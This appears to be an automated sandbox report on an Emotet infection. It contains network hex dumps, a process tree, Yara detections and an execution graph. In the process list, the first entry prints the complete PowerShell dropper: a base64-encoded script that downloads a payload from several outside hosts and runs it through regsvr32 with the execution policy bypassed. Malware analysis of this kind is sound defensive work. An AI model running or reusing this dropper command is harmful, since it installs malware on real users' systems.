                                                                                                                                                                                  Apr 26, 2022 09:46:23.356355906 CEST1077INData Raw: 78 48 83 c4 60 5f c3 cc cc 48 83 ec 28 48 8b 89 a8 00 00 00 48 85 c9 75 04 33 c0 eb 0a 48 8b 49 40 ff 15 4e 03 03 00 48 83 c4 28 c3 cc 48 83 ec 28 48 83 3d bc 25 04 00 00 74 37 48 8b 49 40 ff 15 40 03 03 00 48 8b c8 e8 2c df 00 00 48 85 c0 74 20
                                                                                                                                                                                  Data Ascii: xH`_H(HHu3HI@NH(H(H=%t7HI@@H,Ht HH@HtD%3+H%%H(@SH03H;u3iuH9d%tHc%HH;tHA@L;uHI@HT$ HL$@L\$@D;\$ |D;\$(D$D;D$$|;D$,
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356398106 CEST1078INData Raw: e8 12 38 01 00 4c 8b c6 45 33 c9 ba 01 04 00 00 48 8b 8b 30 01 00 00 ff 15 06 fe 02 00 90 48 8b 17 48 83 ea 18 83 c8 ff f0 0f c1 42 10 ff c8 85 c0 7f 09 48 8b 0a 48 8b 01 ff 50 08 48 8b 5c 24 60 48 8b 74 24 70 48 83 c4 50 5f c3 cc cc cc 48 8b c4
                                                                                                                                                                                  Data Ascii: 8LE3H0HHBHHPH\$`Ht$pHP_HHXHhHpHx AUH@AHAAHfAEEHHDHH'HHHd$8Hd$0Dd$(Hd$ 3JL@=AHcH+H@+}
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356435061 CEST1080INData Raw: 02 48 8b 48 e8 48 3b cb 74 0b 48 8b 01 ff 50 20 4c 8b d8 eb 03 4c 8b db 4c 3b db 75 11 e8 ab 2d 01 00 48 8b 10 48 8b c8 ff 52 20 4c 8b d8 8b cb 4c 3b db 0f 95 c1 3b cb 75 0b b9 05 40 00 80 e8 39 f1 ff ff cc 49 8b 03 49 8b cb ff 50 18 48 83 c0 18
                                                                                                                                                                                  Data Ascii: HHH;tHP LLL;u-HHR LL;;u@9IIPHHD$hH;tHHU\$ LDBHHH\$pH@_^]HhHD$@HEH3H$PHSHAH$PH3jHh@WH0HD$ H
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356478930 CEST1081INData Raw: 8b f2 48 8b e9 48 8b 4a 20 e8 a1 3a 01 00 48 8b f8 48 8d 56 28 48 8d 4c 24 50 ff 15 0f f3 02 00 bb 0f 00 00 00 44 8b cb 44 8d 43 fb 48 8d 54 24 50 48 8b 4f 08 ff 15 64 f3 02 00 8d 43 ef 44 8b c0 8b d0 48 8d 4c 24 50 ff 15 e9 f2 02 00 44 8b 1d 6a
                                                                                                                                                                                  Data Ascii: HHJ :HHV(HL$PDDCHT$PHOdCDHL$PDjAu6ADYKH7>H;D.Au5ADmHg>HDAu1AD/H)
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356539011 CEST1083INData Raw: 33 c0 48 85 c0 41 0f 95 c0 45 85 c0 75 0b b9 05 40 00 80 e8 f1 e6 ff ff cc 48 8b 00 ff 50 18 48 83 c0 18 48 89 07 48 85 db 74 32 48 f7 c3 00 00 ff ff 75 1f 0f b7 db 8b cb e8 07 23 01 00 48 85 c0 74 2b 44 8b c3 48 8b d0 48 8b cf e8 50 f0 ff ff eb
                                                                                                                                                                                  Data Ascii: 3HAEu@HPHHHt2Hu#Ht+DHHPHb3DHHPHH\$HH0_H\$WH HdtHHH\$0H _@SH HHH=4uHHuH
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356578112 CEST1084INData Raw: 02 11 00 00 41 b8 02 00 00 00 ff 15 2b e9 02 00 4c 8d 9c 24 00 01 00 00 49 8b 5b 38 49 8b 6b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 e8 55 8e 00 00 cc 48 85 d2 0f 84 a0 00 00 00 48 89 5c 24 08 48 89 74 24 20 57 48 83 ec 50 48 8b fa
                                                                                                                                                                                  Data Ascii: A+L$I[8Ik@IsHIA_A^A]A\_UHH\$Ht$ WHPHHLL$pLD$hHHt#|$huUHd$@d$8d$0d$(d$ '|$hu2Hd$@d$8d$0D$(D$ E3HHEA"H\$`Ht$xHP_H\$Ht$WH H
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356618881 CEST1085INData Raw: 49 8b 52 08 8b 44 11 0c 3b c3 75 0f 83 7c 11 10 00 74 05 41 ff c3 eb 03 41 ff c1 ff c0 3b c3 75 2e 45 85 db 7f 05 45 85 c9 7e 1e 45 85 c9 75 08 c7 44 11 10 01 00 00 00 7e 0f 4d 3b 42 10 7d 1f 49 8b 42 08 83 64 01 10 00 45 33 c9 45 33 db 48 83 e9
                                                                                                                                                                                  Data Ascii: IRD;u|tAA;u.EE~EuD~M;B}IBdE3E3HIyH [H\$WH Y(HHHH\$0H _@SH HHH [H(LAE3E3M~,E3Mx)M;}$HAAIBTLAIcI
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356658936 CEST1087INData Raw: d6 48 8b cf e8 06 e2 ff ff 90 48 8b c7 48 8b 5c 24 48 48 8b 74 24 50 48 83 c4 30 5f c3 cc cc 48 89 4c 24 08 53 55 56 57 41 54 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b f2 48 8b f9 48 85 d2 79 06 e8 d0 83 00 00 cc 4d 85 c0 78 04 4c 89 41 20 48
                                                                                                                                                                                  Data Ascii: HHH\$HHt$PH0_HL$SUVWATH0HD$ HHHyMxLA Hu_H9QtJ3H9Y~43HGHHBHHPHHcH;G|HO>~HgHgHgHQHuxHi H;HOH\mHH}HGL3H3\$hH
                                                                                                                                                                                  Apr 26, 2022 09:46:23.356709957 CEST1088INData Raw: ff 48 85 ed 0f 88 f1 01 00 00 4c 3b f1 0f 8d e8 01 00 00 48 8b 56 08 83 7c 2a 14 00 74 6b 83 7c 2a 10 00 74 64 49 63 c4 45 85 e4 78 77 48 3b c1 7d 72 48 8d 04 40 48 8d 14 c2 4c 8d 05 bc ea 02 00 48 8d 8c 24 90 00 00 00 e8 2b e0 ff ff 90 48 8b 10
                                                                                                                                                                                  Data Ascii: HL;HV|*tk|*tdIcExwH;}rH@HLH$+HDBH$H$HBHHPAAIHHNIcH;}]4~H$x~TDHAE3H$H$mHH$H$H


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:09:46:13
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                                                                                                                                                                                  Imagebase:0x7ff746f80000
                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:09:46:13
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:09:46:18
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                                                                                                                                                                                  Imagebase:0x7ff746f80000
                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:09:46:27
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq
                                                                                                                                                                                  Imagebase:0x7ff6420c0000
                                                                                                                                                                                  File size:24064 bytes
                                                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:09:46:31
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:09:46:33
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc"
                                                                                                                                                                                  Imagebase:0x7ff6420c0000
                                                                                                                                                                                  File size:24064 bytes
                                                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:09:46:33
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                  Start time:09:46:35
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:09:46:36
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:09:46:36
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                  Imagebase:0x7ff63a600000
                                                                                                                                                                                  File size:163336 bytes
                                                                                                                                                                                  MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:09:46:37
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:09:46:39
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:09:46:45
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:09:46:47
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:09:47:08
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:09:47:18
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                  Imagebase:0x7ff73c930000
                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:09:47:38
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                  Imagebase:0x7ff7b0320000
                                                                                                                                                                                  File size:455656 bytes
                                                                                                                                                                                  MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:09:47:38
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00007FFC01111355 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.317487733.00007FFC01110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01110000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffc01110000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1a2bb9737b5ca2053246cec4b881ee9b273494af21e8e4b600883c569b0debcc
                                                                                                                                                                                    • Instruction ID: 7ba899348569464b8a827700ca9c54ec1a8f1885b38fc66cdf113b3530a12680
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a2bb9737b5ca2053246cec4b881ee9b273494af21e8e4b600883c569b0debcc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7601677115CB0C8FDB48EF0CE451AA6B7E0FB99324F10056DE58AC3655DA36E882CB45
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 00007FFC0111056F Relevance: .6, Instructions: 558COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.317487733.00007FFC01110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01110000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffc01110000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 09367764bd74c479407c63c22c1b48e4deaf6135334c9c2702e8eaa43eb078e4
                                                                                                                                                                                    • Instruction ID: d542d16952c052cd9cdbdacb0ea36fb4ab6e45e96f75c9a57665185691bb6ecd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09367764bd74c479407c63c22c1b48e4deaf6135334c9c2702e8eaa43eb078e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB17877E0D6A68FE706D63CA8B50D5BBA0FF96A3470900F7D0C4CE063EA15248BC665
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00007FFC01111755 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.305103508.00007FFC01110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01110000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc01110000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                                                                                                                                                                                    • Instruction ID: e14747400b03de292d48d70936eac92390de7ef3616bb9bd932641bb88e076a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6101677115CB0C8FDB48EF0CE451AA6B7E0FB99324F10056DE58AC3651DA36E882CB45
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:9.2%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:7.1%
                                                                                                                                                                                    Signature Coverage:2.3%
                                                                                                                                                                                    Total number of Nodes:918
                                                                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                                                                    execution_graph 19821 13cbd1c 19822 13cbd7e 19821->19822 19825 13c9f3c 19822->19825 19824 13cbf86 19826 13c9ffb 19825->19826 19827 13ca0a5 CreateProcessW 19826->19827 19827->19824 19828 13b1fe0 19831 13c0de8 19828->19831 19830 13b204f 19838 13c0e26 19831->19838 19834 13c2768 19834->19830 19836 13c27d8 19854 13b660c 19836->19854 19838->19834 19838->19836 19839 13b3a18 19838->19839 19844 13c2c78 19838->19844 19848 13b59b0 19838->19848 19841 13b3a4d 19839->19841 19840 13b3faf 19840->19838 19841->19840 19843 13b3e08 FindCloseChangeNotification 19841->19843 19858 13cd79c 19841->19858 19843->19841 19846 13c2cab 19844->19846 19845 13cd79c CreateFileW 19845->19846 19846->19845 19847 13c2cf8 19846->19847 19847->19838 19849 13b59dd 19848->19849 19851 13b5d84 19849->19851 19861 13cdb5c 19849->19861 19866 13b28f8 19849->19866 19872 13c7a70 19849->19872 19851->19838 19856 13b6632 19854->19856 19855 13cbd1c CreateProcessW 19857 13b6d2c 19855->19857 19856->19855 19856->19857 19857->19834 19859 13cd822 19858->19859 19860 13cd8ac CreateFileW 19859->19860 19860->19841 19864 13cdc18 19861->19864 19863 13cecdb 19863->19849 19864->19863 19878 13c00f0 19864->19878 19882 13cbd1c 19864->19882 19868 13b293e 19866->19868 19867 13b298d 19867->19849 19868->19867 19869 13b33a6 19868->19869 19871 13c00f0 CreateFileW 19868->19871 19870 13cbd1c CreateProcessW 19869->19870 19870->19867 19871->19868 19876 13c7aa9 19872->19876 19873 13c7ff1 19874 13cbd1c CreateProcessW 19873->19874 19875 13c80f5 19874->19875 19875->19849 19876->19873 19876->19875 19877 13c00f0 CreateFileW 19876->19877 19877->19876 19881 13c011a 19878->19881 19879 13cd79c CreateFileW 19879->19881 19880 13c03ad 19880->19864 19881->19879 19881->19880 19883 13cbd7e 19882->19883 19884 13c9f3c CreateProcessW 19883->19884 19885 13cbf86 19884->19885 19885->19864 19886 1800200f0 19887 180020116 19886->19887 19891 180020153 19887->19891 19893 18002011e 19887->19893 19898 18001ffb4 19887->19898 19891->19893 19940 180004c00 19891->19940 19892 180020195 19892->19893 19894 18001ffb4 163 API calls 19892->19894 19894->19893 19895 180004c00 11 API calls 19896 180020188 19895->19896 19897 18001ffb4 163 API calls 19896->19897 19897->19892 19899 18001ffc2 19898->19899 19900 180020041 19898->19900 19949 180025710 HeapCreate 19899->19949 19902 18002007e 19900->19902 19907 180020045 19900->19907 19903 180020083 19902->19903 19904 1800200d9 19902->19904 20050 180024c8c 19903->20050 19906 18001ffcd 19904->19906 20077 180023558 19904->20077 19906->19891 19907->19906 19910 180025088 46 API calls 19907->19910 19913 180020072 19910->19913 19912 18001ffd9 _RTC_Initialize 19919 18001ffe9 GetCommandLineA 19912->19919 19932 18001ffdd 19912->19932 19916 18002329c 48 API calls 19913->19916 19918 180020077 19916->19918 19917 1800200a3 FlsSetValue 19920 1800200b9 19917->19920 19921 1800200cf 19917->19921 20061 18002575c HeapDestroy 19918->20061 19968 1800254ec 19919->19968 20062 1800232c4 19920->20062 20071 180020300 19921->20071 20055 18002575c HeapDestroy 19932->20055 19934 18002002b 19934->19906 20056 180025088 19934->20056 19938 18002000b 20006 18002329c 19938->20006 19941 18000a565 19940->19941 19942 180004c2b 19940->19942 19945 18001fbe0 _RunAllParam 8 API calls 19941->19945 20920 180004ba4 RtlAllocateHeap 19942->20920 19947 18000a59a 19945->19947 19946 180004c3a VirtualAlloc 20924 1800049ac 19946->20924 